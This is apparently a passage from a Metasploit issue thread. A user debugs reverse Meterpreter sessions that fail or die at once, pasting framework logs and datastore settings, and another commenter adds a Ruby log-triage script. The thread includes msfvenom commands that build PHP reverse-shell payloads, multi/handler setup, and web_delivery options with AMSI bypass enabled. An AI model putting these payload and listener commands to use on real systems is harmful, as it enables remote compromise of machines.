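      first: entry[:time], last: entry[:time],
      trace_lines: 0, note: note_for(message)
    }
    last[:count] += 1
    last[:last] = entry[:time]
  end
  groups.values
end

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_LOG).each do |g|
    puts format('%-7s x%d  %s .. %s  %s', g[:level], g[:count], g[:first], g[:last], g[:message])
    puts "         trace: #{g[:trace_lines]} frame(s)" if g[:trace_lines] > 0
    puts "         note: #{g[:note]}" if g[:note]
  end
end
```

Pass `levels: %i[error warning debug]` to `triage` to keep the `[d(n)]` lines that a higher LogLevel produces.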
I just realised that the IP that Metasploit receives comes from canyouseeme.org (me checking that my ports are open :) ). So I think that's why it couldn't get a session with this host. But that doesn't explain why I couldn't get a session with my payload.
PS: I'm sending you the log file without blanking the IP, just so you can laugh about my stupidity ;).
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with multi/handler]: reverse to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with multi/handler]: bind to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with multi/handler]: noconn to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with multi/handler]: none to reverse
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with multi/handler]: tunnel to reverse
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_uuid is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with multi/handler]: reverse to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with multi/handler]: bind to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with multi/handler]: noconn to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with multi/handler]: none to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with multi/handler]: tunnel to tunnel
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_winhttp is compatible with multi/handler
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with multi/handler]: reverse to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with multi/handler]: bind to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with multi/handler]: noconn to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with multi/handler]: none to tunnel
[09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with multi/handler]: tunnel to tunnel
[09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_winhttps is compatible with multi/handler
[09/09/2020 17:00:21] [d(2)] core: Selected payload bsd/sparc/shell_reverse_tcp from generic payload generic/shell_reverse_tcp
[09/09/2020 17:02:17] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
Call stack:
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:203:in `get_once'
/usr/share/metasploit-framework/lib/msf/base/sessions/command_shell.rb:638:in `shell_read'
/usr/share/metasploit-framework/lib/msf/base/sessions/command_shell.rb:707:in `process_autoruns'
/usr/share/metasploit-framework/lib/msf/core/handler.rb:274:in `register_session'
/usr/share/metasploit-framework/lib/msf/core/handler.rb:252:in `create_session'
/usr/share/metasploit-framework/lib/msf/core/handler.rb:196:in `create_session'
/usr/share/metasploit-framework/lib/msf/core/handler.rb:135:in `handle_connection'
/usr/share/metasploit-framework/lib/msf/core/payload/generic.rb:151:in `redirect_to_actual'
/usr/share/metasploit-framework/lib/msf/core/payload/generic.rb:85:in `handle_connection'
/usr/share/metasploit-framework/lib/msf/core/handler/reverse_tcp.rb:160:in `block (2 levels) in start_handler'
/usr/share/metasploit-framework/lib/msf/core/handler/reverse_tcp.rb:137:in `loop'
/usr/share/metasploit-framework/lib/msf/core/handler/reverse_tcp.rb:137:in `block in start_handler'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'
[09/09/2020 17:09:25] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
Call stack:
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:76:in `sleep'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:66:in `block in exploit'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:63:in `loop'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:63:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:215:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:169:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:140:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:164:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:55:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:201:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
The following global/module datastore, and database setup was configured before the issue occurred:
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
PAYLOAD=generic/shell_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LPORT=4444
LHOST=my ip
The following commands were ran during the session and before this issue occurred:
242 use exploit/multi/handler
243 set LPORT 4444
244 set LHOST my ip
245 exploit
246 debug
The following errors occurred before the issue occurred:
[09/09/2020 17:13:27] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:13:27] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:13:27] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 17:13:28] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 17:15:45] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 17:15:48] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
The following logs were recorded before the issue occurred:
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 17:15:45] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 17:15:48] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
The versions and install method of your Metasploit setup:
Framework: 5.0.101-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x0532887c>.
Install Method: Other - Please specify
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Command shell session 1 opened (my ip:4444 -> 52.202.215.126 (CANYOUSEEME IP):37829) at 2020-09-09 17:15:45 -0400
[*] 52.202.215.126 - Command shell session 1 closed.
^C[-] Exploit failed [user-interrupt]: Interrupt
But that means that my payload doesn't open anything at all.
That's weird, because that also means that my handler works correctly, and it also means that everything is set up correctly, because I'm pinging my IP on the specific port that I use to listen, so I'm lost now.
@apollyonfirstcome In future, please only submit the last 1000 or so lines. The line count there was well over 1000 lines and most of it wasn't relevant. Also please use triple backticks to enclose the output and mark it as code via standard Markdown format.
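The trimming requested above can be done mechanically. The following Ruby sketch is an added example, not part of the original thread and not Metasploit code: it parses log lines in the `[date] [level(verbosity)] source: message` shape quoted in this issue, attaches call-stack lines to their entry, collapses repeats and drops debug chatter. The sample log is constructed from lines in the thread; treating the "Dependency ... is not supported" lines as startup noise and keeping the "Selected payload ... from generic payload" debug line are assumptions of this example.

```ruby
# Added example: triage of framework.log-style lines as quoted in this thread.

# Header of one log entry: [MM/DD/YYYY HH:MM:SS] [level(verbosity)] source: message
HEADER = /\A\[(\d{2}\/\d{2}\/\d{4} \d{2}:\d{2}:\d{2})\] \[([a-z])\((\d)\)\] (\w+): (.*)\z/

# Assumption: these errors repeat at every console start and are unrelated to the handler.
NOISE = [/\ADependency for \S+ is not supported\z/].freeze

# Assumption: this debug line is worth keeping because it names the payload the
# handler actually resolved when only a generic payload was configured.
KEEP_DEBUG = [/\ASelected payload \S+ from generic payload /].freeze

# Constructed sample input, modelled on lines quoted in the thread.
SAMPLE_LOG = <<~'LOG'
  [09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with multi/handler]: reverse to reverse
  [09/09/2020 17:00:21] [d(1)] core: Module windows/x64/vncinject/reverse_tcp is compatible with multi/handler
  [09/09/2020 17:00:21] [d(2)] core: Selected payload bsd/sparc/shell_reverse_tcp from generic payload generic/shell_reverse_tcp
  [09/09/2020 17:02:17] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
  Call stack:
  /usr/share/metasploit-framework/lib/msf/core/handler.rb:135:in `handle_connection'
  [09/09/2020 17:13:27] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
  [09/09/2020 17:14:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
  [09/09/2020 17:15:45] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
  [09/09/2020 17:15:48] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
LOG

# Split raw text into entries; lines without a header (call stacks) are
# attached to the entry that precedes them.
def parse_entries(text)
  entries = []
  text.each_line(chomp: true) do |line|
    if (m = HEADER.match(line))
      entries << { time: m[1], level: m[2], verbosity: m[3].to_i,
                   source: m[4], message: m[5], trace: [] }
    elsif entries.any? && !line.strip.empty?
      entries.last[:trace] << line
    end
  end
  entries
end

# Keep error entries plus selected debug lines, and group identical messages
# with a count and first/last timestamp. Input order is preserved.
def triage(text, noise: NOISE, keep_debug: KEEP_DEBUG)
  groups = {}
  parse_entries(text).each do |e|
    relevant = e[:level] == 'e' || keep_debug.any? { |re| re.match?(e[:message]) }
    next unless relevant

    g = groups[e[:message]] ||= {
      message: e[:message], level: e[:level], count: 0,
      first_seen: e[:time], last_seen: e[:time],
      noise: noise.any? { |re| re.match?(e[:message]) },
      trace: e[:trace]
    }
    g[:count] += 1
    g[:last_seen] = e[:time]
    g[:trace] = e[:trace] if g[:trace].empty? # keep the first call stack seen
  end
  groups.values
end

# One line per distinct, non-noise message: short enough to paste into an issue.
def report(text)
  triage(text).reject { |g| g[:noise] }.map do |g|
    format('%s x%d [%s] %s', g[:first_seen], g[:count], g[:level], g[:message])
  end
end

puts report(SAMPLE_LOG) if __FILE__ == $PROGRAM_NAME
```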
Okay, sorry.
Np, all good. All a learning experience. Spoke to one of my colleagues about this, and he pointed out that it seems you aren't specifying the payload in the exploit/multi/handler, so it's defaulting to the normal command payload handler, aka generic/shell_reverse_tcp. Try something like this:
use exploit/multi/handler
set PAYLOAD php/meterpreter/bind_tcp
set LHOST *your IP*
set LPORT 4444 (or whatever you set it to when generating the payload)
exploit
If you don't specify the PAYLOAD option it will default to generic/shell_reverse_tcp which is not what you want. You can see this below with the output from MSF6:
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >
Sorry, but I did set the payload correctly, except for the last test, because I did it precipitately since it is around 2 am where I live. So sorry, but the problem is still present. That being said, I can do it again to replace the last log that I gave you, if that can help.
I will do it more carefully next time. Sorry to make you lose your time with the last log, MY BAD. So sorry.
No problem, all good, take your time. If it's 2 am your time, then get some sleep.
Okay, thanks, I will keep you updated tomorrow if you're still available. And again, thanks a lot, because I've been on this issue for one week and I have some clients, so thanks a lot for your time.
Did you have any news about this issue?
I changed my VPN IP and then tried again with these two payloads:
msfvenom -p php/meterpreter_reverse_tcp LHOST=mynewvpnip LPORT=8888 -f raw > /home/mycomput/Desktop/test1.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=mynewvpnip LPORT=4444 -f raw > /home/mycomput/Desktop/test2.php
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
The following global/module datastore, and database setup was configured before the issue occurred:
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
PAYLOAD=php/meterpreter_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LHOST=MY new vpn ip
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
The following commands were ran during the session and before this issue occurred:
248 use exploit/multi/handler
249 set payload php/meterpreter_reverse_tcp
250 set LHOST my new vpn ip
251 set LPORT 8888
252 show options
253 exploit
254 set LPORT 4444
255 show options
256 exploit
257 debug
The following errors occurred before the issue occurred:
[09/10/2020 08:14:00] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:23:25] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 08:38:34] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:38:34] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:38:36] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:38:36] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:38:44] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 08:47:19] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 09:01:43] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 09:16:36] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
The following logs were recorded before the issue occurred:
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 17:14:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 17:15:45] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 17:15:48] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 08:12:12] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:12:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:12:14] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:12:14] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:12:21] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:12:21] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:12:21] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:12:22] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:12:59] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:12:59] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:13:01] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:13:01] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:13:58] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:13:58] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:14:00] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:14:00] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:23:25] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 08:38:34] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:38:34] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/10/2020 08:38:36] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/10/2020 08:38:36] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/10/2020 08:38:44] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 08:47:19] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 09:01:43] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/10/2020 09:16:36] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
The versions and install method of your Metasploit setup:
Framework: 5.0.101-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x05a97158>.
Install Method: Other - Please specify
And still no ping back from my payload.
@apollyonfirstcome So earlier you said it was connecting back and opening a session but the session died. Now you're saying you're not getting anything back from the server? Do you mind pasting the console output when you got that error? All I see is interrupts, presumably from when you CTL+C'd the shell after waiting too long. The earlier errors from before are now gone at least.
Yes, like I told you yesterday, the session that was connected and died immediately after came from canyouseeme.org (me checking if my ports are correctly open). In fact no session comes from my payload; that's why you see me doing a Ctrl+C, because the handler stays open but nothing happens, so after 10 minutes I quit the session handler.
So if I don't verify that my port is open, then no session is created, so no error, just the handler remains open indefinitely.
To be honest it sounds like a networking issue, not something with Metasploit specifically. I would double check your setup; it's hard for me to tell what's happening, but if you're not even getting a connection back then that's a little odd. Sounds like your port is still accessible on the target if canyouseeme.org is able to access it, but it's possible whatever is connecting to it isn't connecting right or isn't making that connection attempt for some reason.
For my configuration, I work from a VM in Workstation Pro on a NAT connection, but I've tested a bridged connection also and the same problem occurs. I use a VPN directly connected to my VM through WireGuard. But I thought the problem may come from the WireGuard adapter (wg0), which Metasploit can't handle, I think.
@apollyonfirstcome Yeah, it's possible it's not able to handle that. I'd try to see if any other Metasploit module successfully connects through the VPN first. If that doesn't work, then you can confirm that it's likely the VPN and Metasploit not being compatible for some reason.
Yes, I will check that too, but before that I will reinstall another VM with a different version of Kali and I will try to use OpenVPN instead. I'll keep you updated.
Okay, I solved some issues. Before, I could not get a session; but now I can receive the desired packet (captured with Wireshark) that starts the desired session, but unfortunately for me the sessions die instantly. So now I know that my payload works correctly with my VPN and my handler works too.
How I fixed this issue of having no session at all: I just ran a new VM with a new metasploit-framework downloaded from GitHub, I ran my VPN through OpenVPN and made some improvements to it, so everything is almost good except for the session dying instantly, UNFORTUNATELY.
I keep digging.
Payload used: linux/x86/meterpreter_reverse_tcp
[*] Meterpreter session 1 opened (MYIP:4444 -> CORRECTIPFROMPAYLOAD:33719) at ........... -0400
[*] desireip - Meterpreter session 1 closed. Reason: Died
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
The following global/module datastore, and database setup was configured before the issue occurred:
[framework/ui/console]
ActiveModule=exploit/multi/script/web_delivery
[multi/script/web_delivery]
Payload=linux/x86/meterpreter_reverse_tcp
Powershell::exec_in_place=true
Powershell::remove_comsec=true
WORKSPACE=
VERBOSE=false
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=false
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=false
Powershell::sub_funcs=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
SRVHOST=0.0.0.0
SRVPORT=myport
ListenerComm=
SSL=false
SSLCert=
SSLCompression=false
SSLCipher=
TCP::max_send_size=0
TCP::send_delay=0
URIPATH=
HTTP::no_cache=false
HTTP::chunked=false
HTTP::header_folding=false
HTTP::junk_headers=false
HTTP::compression=none
HTTP::server_name=Apache
URIHOST=
URIPORT=
SendRobots=false
PSH-AmsiBypass=true
PSH-AmsiBypassURI=
PSH-EncodedCommand=true
PSH-ForceTLS12=true
PSH-Proxy=true
PSHBinary-PATH=
PSHBinary-FILENAME=
LHOST=my ip
target=6
LPORT=my port2
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
PingbackRetries=0
PingbackSleep=30
The following commands were ran during the session and before this issue occurred:
49 use exploit/multi/script/web_delivery
52 set LHOST my ip
53 set srvport my port 1
65 set payload linux/x86/meterpreter_reverse_tcp
66 clear
67 show options
68 exploit
76 debug
The following errors occurred before the issue occurred:
[09/13/2020 14:58:13] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError php/meterpreter_reverse_tcp is not a compatible payload.
[09/13/2020 14:58:24] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 15:00:14] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError php/meterpreter_reverse_tcp is not a compatible payload.
[09/13/2020 15:56:06] [e(0)] rex: Failed to find handler for resource: /status
[09/13/2020 15:56:06] [e(0)] rex: Failed to find handler for resource: /stat
The following logs were recorded before the issue occurred:
[09/13/2020 13:30:17] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 13:30:17] [d(0)] core: Created user based module store
[09/13/2020 13:30:24] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 13:30:24] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 13:30:24] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 13:30:24] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 13:30:24] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 14:06:59] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/13/2020 14:13:25] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/13/2020 14:13:55] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 14:13:58] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:13:58] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:13:58] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:13:58] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:13:58] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 14:18:27] [e(0)] core: Exploit failed (multi/script/web_delivery): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[09/13/2020 14:18:38] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 14:18:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:18:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:18:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:18:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:18:40] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 14:49:23] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:49:23] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:49:24] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:49:24] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:50:41] [e(0)] core: Exploit failed (multi/script/web_delivery): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[09/13/2020 14:51:27] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 14:51:29] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:51:29] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:51:29] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:51:29] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:51:30] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 14:58:13] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError php/meterpreter_reverse_tcp is not a compatible payload.
[09/13/2020 14:58:24] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 15:00:14] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError php/meterpreter_reverse_tcp is not a compatible payload.
[09/13/2020 15:56:06] [e(0)] rex: Failed to find handler for resource: /status
